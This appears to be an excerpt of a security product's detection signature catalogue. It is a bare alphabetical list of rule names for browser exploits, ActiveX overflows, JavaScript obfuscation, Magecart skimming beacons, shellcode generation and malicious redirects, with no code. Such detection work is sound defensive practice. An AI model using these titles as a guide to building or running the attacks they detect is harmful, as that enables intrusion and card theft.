File-Text_Internet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2020-17053
File-Text_Internet-Explorer-Scroll-Event-Remote-Code-Execution
File-Text_Internet-Explorer-Security-Zone-Bypass-Url-Spoofing
File-Text_Internet-Explorer-Sysmon-ActiveX-Denial-Of-Service
File-Text_Internet-Explorer-toStaticHTML-Cross-Site-Scripting
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2557
File-Text_Internet-Explorer-Uninitialized-Memory-Corruption-CVE-2010-2559
File-Text_Internet-Explorer-Uninitialized-Parameter-DoS
File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4787
File-Text_Internet-Explorer-Use-After-Free-CVE-2012-4792
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0025-And-CVE-2013-1288
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0026
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0029
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0087
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0088
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0090
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0091
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0092
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0093
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-0094
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-2551
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3110
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3111
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3112-2
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3116
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3117
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3119
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3120
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3121
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3122
File-Text_Internet-Explorer-Use-After-Free-CVE-2013-3142
File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030
File-Text_Internet-Explorer-VML-Memory-Corruption-CVE-2013-0030-2
File-Text_Internet-Explorer-Vulnerability-CVE-2016-0002
File-Text_Internet-Shortcut-File-MHTML-URL-Prefix
File-Text_Internet-Shortcut-File-Transfer
File-Text_Internet_Explorer_11_Buffer_Overrun_Vulnerability_CVE-2019-0666
File-Text_Internet_Explorer_11_Security_Bypass_Vulnerability_CVE-2019-0768
File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0665
File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0667
File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0680
File-Text_Internet_Explorer_11_Use_After_Free_Vulnerability_CVE-2019-0763
File-Text_Internet_Explorer_Arbitrary_Pointer_Dereference_Vulnerability_CVE-2019-0884
File-Text_Internet_Explorer_Integer_Overflow_Vulnerability_CVE-2019-0794
File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0752
File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2019-0753
File-Text_Internet_Explorer_Memory_Corruption_Vulnerability_CVE-2021-26411
File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2020-0968
File-Text_Internet_Explorer_Remote_Code_Execution_Vulnerability_CVE-2021-26419
File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0824
File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0832
File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0833
File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2020-0847
File-Text_Internet_Explorer_Scripting_Engine_Vulnerability_CVE-2021-34448
File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-0920
File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1238
File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2019-1239
File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1216
File-Text_Internet_Explorer_Type_Confusion_Vulnerability_CVE-2020-1230
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1035
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1060
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1062
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1213
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1214
File-Text_Internet_Explorer_Use-After-Free_Vulnerability_CVE-2020-1215
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0793
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0862
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0918
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0930
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-0988
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1005
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1055
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1060
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1390
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1429
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-0674
File-Text_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2020-1260
File-Text_Invalid-Style-Tag
File-Text_Invisible-Inline-Frame
File-Text_InvokeAI-RCE
File-Text_Iseemedia-LPViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow
File-Text_Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
File-Text_Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
File-Text_Java-Unsigned-Applet-Execution
File-Text_JavaScript-ActiveX-Class-Id-Obfuscation
File-Text_JavaScript-ActiveX-Obfuscation
File-Text_JavaScript-Alert-Exception-Obfuscation
File-Text_JavaScript-Cookie-Xor-Obfuscation-Method
File-Text_JavaScript-Create-Noscript-Element
File-Text_JavaScript-Document-Object-Obfuscation
File-Text_JavaScript-Dual-Custom-Function-Obfuscation-Method
File-Text_JavaScript-Escaped-Obfuscation-Method
File-Text_JavaScript-Eval-Function-Overridden
File-Text_JavaScript-FromCharCode-Obfuscation-Detected
File-Text_JavaScript-FromCharCode-Obfuscation-Detected-2
File-Text_JavaScript-Function-Obfuscation
File-Text_JavaScript-Inline-Comment-Obfuscation
File-Text_JavaScript-Innerhtml-Property-Obfuscation
File-Text_JavaScript-LOIC-Download
File-Text_JavaScript-Obfuscated-With-Hangul-Filler-Characters
File-Text_JavaScript-Obfuscation-Method-Detected
File-Text_JavaScript-Object-Instantiation-Obfuscation
File-Text_JavaScript-Packed-Obfuscation-Method
File-Text_JavaScript-Reference-To-Program-Files-Resource
File-Text_JavaScript-Replace-Obfuscation
File-Text_JavaScript-Self-Reference
File-Text_JavaScript-ShellCode-Generation
File-Text_JavaScript-ShellCode-Generation-2
File-Text_JavaScript-ShellCode-Generation-3
File-Text_JavaScript-ShellCode-Generation-4
File-Text_JavaScript-Split-Comment-Obfuscation
File-Text_JavaScript-Split-With-Non-Ascii-Separator
File-Text_JavaScript-String-Split-Obfuscation
File-Text_JavaScript-String-Value-Obfuscation
File-Text_JavaScript-StringFromCharCode-Multiple-Encodings-Obfuscation
File-Text_JavaScript-Strings-Reverse-Encoded
File-Text_JavaScript-Suspicious-External-Reference
File-Text_JavaScript-Suspicious-Function-Name-Crash
File-Text_JavaScript-Suspicious-Function-Name-Exploit
File-Text_JavaScript-Suspicious-Function-Name-Heapspray
File-Text_JavaScript-Suspicious-String-Reversal
File-Text_JavaScript-Unescape-Obfuscation-Access-With-Outdated-Browser
File-Text_JavaScript-Unescape-Obfuscation-Method
File-Text_JavaScript-Unescape-Obfuscation-Method-2
File-Text_JavaScript-Xor-Obfuscation-Method
File-Text_JavaScript-Xor-One-Time-Pad-Obfuscation-Method
File-Text_JavaScript_Injected-Wordpress
File-Text_Jenkins-Active-Choices-Plugin-CVE-2021-21699-Stored-Cross-Site-Scripting
File-Text_Jenkins-Ci-Server-Xstream-Insecure-Deserialization
File-Text_Jenkins-Git-Client-Remote-Command-Execution
File-Text_Jenkins-Gitlab-Plugin-Stored-Cross-Site-Scripting
File-Text_Jenkins-Rundeck-Plugin-Stored-Cross-Site-Scripting
File-Text_JetBrains-TeamCity-Avatar-Stored-Cross-Site-Scripting
File-Text_JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039
File-Text_Jfogs-Obfuscated-JavaScript-Detected
File-Text_Jjencode-Obfuscated-JavaScript-Detected
File-Text_Joplin-Mdtohtml-Cross-Site-Scripting
File-Text_jQuery-Cross-Site-Scripting-CVE-2020-11023
File-Text_JS-Obfuscator-Obfuscated-JavaScript-Detected
File-Text_JS-Obfuscator-Obfuscated-Malicious-JavaScript-Detected
File-Text_JScript-Obfuscated-Reference
File-Text_JSFuck-JavaScript-Obfuscation
File-Text_JSON-Object-With-Unnecessarily-Escaped-Characters
File-Text_Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
File-Text_KaiXin-Exploit-Kit-Landing-Page
File-Text_Kingsoft-WPS-Office-Path-Traversal-CVE-2024-7262
File-Text_Konqueror-FTP-Iframe-Null-Pointer-Dereference-DoS
File-Text_Leadtools-Raster-Twain-Ltocxtwainu-ActiveX-Control-Buffer-Overflow
File-Text_Lethic-Activity
File-Text_LG-Simple-Editor-Copystickercontent-Directory-Traversal
File-Text_LG-Simple-Editor-Copytemplateall-Directory-Traversal
File-Text_LG-Simple-Editor-Savexml-Directory-Traversal
File-Text_Libcue-Out-Of-Bounds-Array-Access-CVE-2023-43641
File-Text_LibreOffice-Hsqldb-Arbitrary-File-Write
File-Text_Libvpx-Heap-Buffer-Overflow-CVE-2023-5217
File-Text_Libxml2-Xml-File-Processing-Long-Entity-Name-Buffer-Overflow
File-Text_Libyaml-Scanner-YAML_Parser_Scan_URI_escapes-Heap-Buffer-Overflow
File-Text_LightOpenCMS-Smarty.php-Local-File-Inclusion
File-Text_Linux-Kernel-Netfilter-Iptables-Restore-Stack-Based-Buffer-Overflow
File-Text_Liquid-XML-Studio-LtXmlComHelp8.dll-ActiveX-OpenFile-Buffer-Overflow
File-Text_Logitech-VideoCall-WebCamXMP-ActiveX-Control-Buffer-Overflow
File-Text_Logsign-Unified-Secops-Authentication-Failure
File-Text_Logsign-Unified-Secops-Platform-Missing-Authentication-CVE-2024-5721
File-Text_Long-Domain-Name-In-HREF
File-Text_Lotus-Domino-Web-Access-ActiveX-Control-Server-Name-Buffer-Overflow
File-Text_Lotus-Notes-URI-Handler-Argument-Injection
File-Text_Lotus-Quickr-Qp2.cab-ActiveX-Control-Integer-Overflow
File-Text_MacOS-Gatekeeper-Check-Bypass-CVE-2021-30657
File-Text_Macromedia-Flash-Player-LoadMovie-DoS
File-Text_Macromedia-Shockwave-mwdir.dll-ActiveX-Control-Buffer-Overflow
File-Text_Macromedia-Shockwave-swdir.dll-ActiveX-Control-Denial-Of-Service-CVE-2006-6885
File-Text_Macrovision-InstallShield-Update-Service-ActiveX-Code-Execution
File-Text_Macrovision-InstallShield-Update-Service-Agent-ActiveX
File-Text_Macrovision-InstallShield-Update-Service-Isusweb.dll-Buffer-Overflow
File-Text_Magecart-Beacon
File-Text_Magecart-Beacon-2
File-Text_Magecart-Beacon-3
File-Text_Magecart-Beacon-4
File-Text_Magento-API-Unserialize-Remote-Code-Execution
File-Text_Magnetosoft-AddDestinationEntry-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-DNS-DNSLookupHostWithServer-ActiveX-Control-Format-String
File-Text_Magnetosoft-NetResources-NetConnectionEnum-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-NetResources-NetFileClose-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-NetResources-NetSessionDel-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-NetResources-NetShareEnum-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-SNTP-SntpGetReply-ActiveX-Control-Buffer-Overflow
File-Text_Magnetosoft-SNTP-SntpSendRequest-ActiveX-Control-Buffer-Overflow
File-Text_Mail-Script-Body
File-Text_Malicious-Function-Name-In-Script
File-Text_Malicious-Iframe-2
File-Text_Malicious-Internet-Shortcut-File
File-Text_Malicious-Java-Applet-Reference
File-Text_Malicious-Metasploit-Function-In-Script
File-Text_Malicious-Obfuscated-JavaScript-VBScript-Detected
File-Text_Malicious-Obfuscated-Reversed-PowerShell-Detected
File-Text_Malicious-Obfuscated-Script-File
File-Text_Malicious-Script-Blogspot-A-Detected
File-Text_Malicious-Script-Blogspot-Detected
File-Text_Malicious-VBScript-Detected
File-Text_Malicious-VBScript-Execution
File-Text_Malicious_Download_Redirect
File-Text_Malicious_Redirection_Detected
File-Text_Malicious_Redirection_Detected-2
File-Text_Malicious_Redirection_Detected-3
File-Text_Malicious_Redirection_Detected-4
File-Text_Malicious_Redirection_Detected-5
File-Text_Malicious_Redirection_EtterSilent_Detected
File-Text_Malicious_Scripting-From-Unresolved-Hostname
File-Text_Malwarebytes-Anti-Malware-URI-Handler-Remote-Code-Execution
File-Text_Mapurltozone-Security-Feature-Bypass-CVE-2025-21247
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog
File-Text_McAfee-FreeScan-Information-Disclosure
File-Text_McAfee-NeoTrace-ActiveX-Control-TraceTarget-Method-Buffer-Overflow
File-Text_McAfee-Security-Center-Mcinsctl.dll-ActiveX-Control-File-Overwrite
File-Text_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
File-Text_McAfee-Virtual-Technician-ActiveX-Control-Insecure-Method-Exposure
File-Text_McAfee-Virtual-Technician-Mvt.mvtcontrol-ActiveX-Insecure-Method
File-Text_Media-Foundation-Memory-Corruption-CVE-2018-8251
File-Text_MediaWiki-SyntaxHighlight-Extension-Option-Injection-Vulnerability
File-Text_Metabase-Remote-Code-Execution-CVE-2023-38646
File-Text_Metasploit-JavaScript-Encryption
File-Text_Metasploit-JavaScript-Escape-Evasion
File-Text_Metasploit-msfd-Browser-Remote-Code-Execution
File-Text_MGI-LPViewer-LPControl-ActiveX-Control-Buffer-Overflow
File-Text_Micro-Focus-Rumba-Walldata.macro-Playmacro-Memory-Corruption
File-Text_Microsoft-.NET-Framework-Proxy-Auto-Discovery-Code-Execution
File-Text_Microsoft-.NET-Privilege-Escalation-CVE-2015-6096
File-Text_Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
File-Text_Microsoft-Access-Wizard-ActiveX-Control-Memory-Corruption
File-Text_Microsoft-ActiveX-Data-Objects-Cachesize-Memory-Corruption
File-Text_Microsoft-Agent-Crafted-Url-Stack-Buffer-Overflow
File-Text_Microsoft-Authentication-Failure
File-Text_Microsoft-Browser-Memory-Corruption-CVE-2016-0105
File-Text_Microsoft-Browser-Scripting-Engine-CVE-2016-3382-Type-Confusion
File-Text_Microsoft-CAPICOM-Certificates-ActiveX-Control-Vulnerability
File-Text_Microsoft-Data-Analyzer-ActiveX-Control-Code-Execution-CVE-2010-0252
File-Text_Microsoft-Defender-Remote-Code-Execution
File-Text_Microsoft-DHTML-Editing-Component-ActiveX-Control-Remote-Execution
File-Text_Microsoft-DirectPlay-Heap-Overflow-Vulnerability
File-Text_Microsoft-Edge-And-Internet-Explorer-Chakra-CVE-2018-8145-Heap-Buffer-Overflow
File-Text_Microsoft-Edge-And-Internet-Explorer-CVE-2016-3326-Use-After-Free
File-Text_Microsoft-Edge-And-Internet-Explorer-Information-Disclosure-CVE-2017-8529
File-Text_Microsoft-Edge-Array.join-Type-Confusion
File-Text_Microsoft-Edge-Asm.js-Type-Confusion
File-Text_Microsoft-Edge-Asmjsinterpreter-Use-After-Free
File-Text_Microsoft-Edge-Boxstackinstance-Type-Confusion
File-Text_Microsoft-Edge-Buffer-Overrun-Vulnerability-CVE-2019-0642
File-Text_Microsoft-Edge-Chakra-Arguments-Off-By-One
File-Text_Microsoft-Edge-Chakra-Array.map-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Array.shift-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Asmjsbytecodegenerator-Emitcall-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Eval-CVE-2017-8636-Integer-Overflow
File-Text_Microsoft-Edge-Chakra-Eval-Integer-Overflow-CVE-2017-8641
File-Text_Microsoft-Edge-Chakra-Inlinearraypush-Inlinearraypop-Type-Confusion
File-Text_Microsoft-Edge-Chakra-JavaScript-Engine-CVE-2016-0193-Memory-Corruption
File-Text_Microsoft-Edge-Chakra-LowerBoundCheck-Integer-Overflow
File-Text_Microsoft-Edge-Chakra-Method-Propertystring-Object-Type-Confusion
File-Text_Microsoft-Edge-Chakra-MinInAnArray-MaxInAnArray-Type-Confusion
File-Text_Microsoft-Edge-Chakra-NewScObjectNoCtor-InitProtoType-Confusion
File-Text_Microsoft-Edge-Chakra-OP_memset-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8466
File-Text_Microsoft-Edge-Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8467
File-Text_Microsoft-Edge-Chakra-Templatedforeachiteminrange-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Todefiniteanynumber-Type-Confusion
File-Text_Microsoft-Edge-Chakra-Type-Confusion-Suspected-Exploit
File-Text_Microsoft-Edge-Code-Execution-CVE-2015-6168
File-Text_Microsoft-Edge-Coptionscollectioncacheitem-Out-Of-Bounds-Read
File-Text_Microsoft-Edge-CVE-2015-2442
File-Text_Microsoft-Edge-CVE-2015-2446
File-Text_Microsoft-Edge-CVE-2015-6064
File-Text_Microsoft-Edge-CVE-2016-0003-Type-Confusion
File-Text_Microsoft-Edge-CVE-2016-0161-Privilege-Escalation
File-Text_Microsoft-Edge-CVE-2016-3222-Memory-Corruption
File-Text_Microsoft-Edge-CVE-2016-3244-Information-Disclosure
File-Text_Microsoft-Edge-CVE-2016-7200
File-Text_Microsoft-Edge-CVE-2016-7206
File-Text_Microsoft-Edge-CVE-2016-7242
File-Text_Microsoft-Edge-CVE-2016-7286-Memory-Corruption
File-Text_Microsoft-Edge-CVE-2016-7287
File-Text_Microsoft-Edge-CVE-2017-0065-Information-Disclosure
File-Text_Microsoft-Edge-CVE-2017-0070-Getter-Use-After-Free
File-Text_Microsoft-Edge-CVE-2017-8652-Use-After-Free
File-Text_Microsoft-Edge-Document.domain-Same-Origin-Policy-Bypass
File-Text_Microsoft-Edge-Doloopbodystart-Out-Of-Bounds-Read
File-Text_Microsoft-Edge-Frame-Elements-Same-Origin-Policy-Bypass
File-Text_Microsoft-Edge-Information-Disclosure-CVE-2018-8545
File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2016-3277
File-Text_Microsoft-Edge-Information-Disclosure-Vulnerability-CVE-2017-0017
File-Text_Microsoft-Edge-InstanceOf-Type-Confusion
File-Text_Microsoft-Edge-JavaScript-Engine-Array.shift-Method-Memory-Corruption
File-Text_Microsoft-Edge-JavaScript-Engine-Array.unshift-Method-Memory-Corruption
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-0024
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3199
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3222
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2016-3271
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0010
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2017-0141
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-0980
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8110
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8111
File-Text_Microsoft-Edge-Memory-Corruption-CVE-2018-8236
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2016-0191
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0758
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0762
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0777
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0872
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0874
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0889
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0930
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0933
File-Text_Microsoft-Edge-Memory-Corruption-Vulnerability-CVE-2018-0934
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2018-8137
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0610
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0644
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0648
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0652
File-Text_Microsoft-Edge-Out-Of-Bounds-Vulnerability-CVE-2019-0658
File-Text_Microsoft-Edge-PreVisitCatch-Uninitialized-Memory-Use
File-Text_Microsoft-Edge-Profiledldelem-Type-Confusion
File-Text_Microsoft-Edge-RCE-CVE-2017-0200
File-Text_Microsoft-Edge-RCE-CVE-2017-0227
File-Text_Microsoft-Edge-RCE-CVE-2017-0228
File-Text_Microsoft-Edge-RCE-CVE-2017-0236
File-Text_Microsoft-Edge-RCE-CVE-2017-0238
File-Text_Microsoft-Edge-RCE-CVE-2017-0240
File-Text_Microsoft-Edge-Remote-Code-Execution-CVE-2019-0541
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8496-2
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8497
File-Text_Microsoft-Edge-Remote-Code-Execution-Vulnerability-CVE-2017-8617
File-Text_Microsoft-Edge-Scripting-Engine-CVE-2016-7240-Memory-Corruption
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8367
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8391
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2018-8459
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0539
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0565
File-Text_Microsoft-Edge-Scripting-Engine-Memory-Corruption-CVE-2019-0568
File-Text_Microsoft-Edge-Security-Feature-Bypass-CVE-2016-3198
File-Text_Microsoft-Edge-Spoofing-Vulnerability-CVE-2018-8383
File-Text_Microsoft-Edge-Type-Confusion-CVE-2018-8588
File-Text_Microsoft-Edge-Type-Confusion-Remote-Code-Execution-CVE-2017-8524
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2017-8601
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0951
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0953
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-0993
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8133
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8179
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8583
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8618
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8624
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2018-8629
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0590
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0591
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0593
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0606
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0607
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0650
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0651
File-Text_Microsoft-Edge-Type-Confusion-Vulnerability-CVE-2019-0655
File-Text_Microsoft-Edge-Typedarray.sort-Use-After-Free
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2017-8605
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0946
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-0954
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2018-8123
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0640
File-Text_Microsoft-Edge-Use-After-Free-Vulnerability-CVE-2019-0645
File-Text_Microsoft-Edge-XSS-CVE-2015-6170
File-Text_Microsoft-Embedded-Font-EOT-File-Reference
File-Text_Microsoft-Excel-SLK-Payload-Delivery
File-Text_Microsoft-Exchange-Outlook-Web-Access-CSRF-CVE-2010-3213
File-Text_Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
File-Text_Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS
File-Text_Microsoft-Help-Centre-Code-Execution
File-Text_Microsoft-Help-Centre-Malformed-Escape-Sequence
File-Text_Microsoft-Help-Centre-Protocol-Access
File-Text_Microsoft-HtmlDlgHelper-ActiveX-Component-Usage
File-Text_Microsoft-Ie-ActiveX-IObjectsafety-Implementation-Code-Execution
File-Text_Microsoft-Ie-Body-Element-Use-After-Free
File-Text_Microsoft-Ie-CVE-2016-7198
File-Text_Microsoft-Ie-ExecScript-File-Disclosure-Vulnerability
File-Text_Microsoft-Ie-Memory-Corruption-CVE-2010-0267
File-Text_Microsoft-Ie-NMSA.ASFSourceMediaDescription-DoS-Vulnerability
File-Text_Microsoft-Ie-RDS.DataControl.URL-DoS
File-Text_Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure
File-Text_Microsoft-Ie-setHomePage-Function-Vulnerability
File-Text_Microsoft-Ie-Use-After-Free-CVE-2016-7196
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access
File-Text_Microsoft-IIS-IDQ-IDA-HTX-Access-Unsuccess
File-Text_Microsoft-Intenet-Explorer-Scripting-Engine-Memory-Corruption-CVE-2018-8643
File-Text_Microsoft-Internet-Explorer-7-WebDAV-Pathname-Code-Execution
File-Text_Microsoft-Internet-Explorer-Address-Bar-Spoofing-Vulnerability
File-Text_Microsoft-Internet-Explorer-ALSR-Bypass-CVE-2015-2421
File-Text_Microsoft-Internet-Explorer-And-Edge-Blocksite.htm-Spoofing
File-Text_Microsoft-Internet-Explorer-And-Edge-Column-span-Type-Confusion
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2015-6140-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0061-Type-Confusion
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-0154-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3247-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-3351-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7195-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7202-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-And-Edge-CVE-2016-7287-Type-Confusion
File-Text_Microsoft-Internet-Explorer-And-Edge-Json.parse-Type-Confusion
File-Text_Microsoft-Internet-Explorer-And-Edge-Memory-Corruption-CVE-2016-3297
File-Text_Microsoft-Internet-Explorer-And-Edge-Substring-New-Out-Of-Bounds-Read
File-Text_Microsoft-Internet-Explorer-And-Sharepoint-toStaticHTML-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-Animatemotion-Properties-Assignment-Vulnerability
File-Text_Microsoft-Internet-Explorer-Array-Type-Confusion
File-Text_Microsoft-Internet-Explorer-Arraybuffer.slice-Information-Disclosure
File-Text_Microsoft-Internet-Explorer-ASLR-Bypass-CVE-2015-6088
File-Text_Microsoft-Internet-Explorer-Asynchronous-Null-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Attribute-Removal-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Attribute-Value-Type-Confusion
File-Text_Microsoft-Internet-Explorer-Body-Element-Use-After-Free
File-Text_Microsoft-Internet-Explorer-Body-Replace-Memory-Corruption-CVE-2015-6150
File-Text_Microsoft-Internet-Explorer-BrowseDialog-ActiveX-Control-Denial-of-Service
File-Text_Microsoft-Internet-Explorer-Cattrarray-Type-Confusion
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CElement-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-Center-Element-Out-Of-Bounds-Array-Indexing
File-Text_Microsoft-Internet-Explorer-CFormElement-Use-After-Free-Vulnerability
File-Text_Microsoft-Internet-Explorer-Cgeneratedcontent-Unwrapcontent-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-CGenericElement-Memory-Corruption
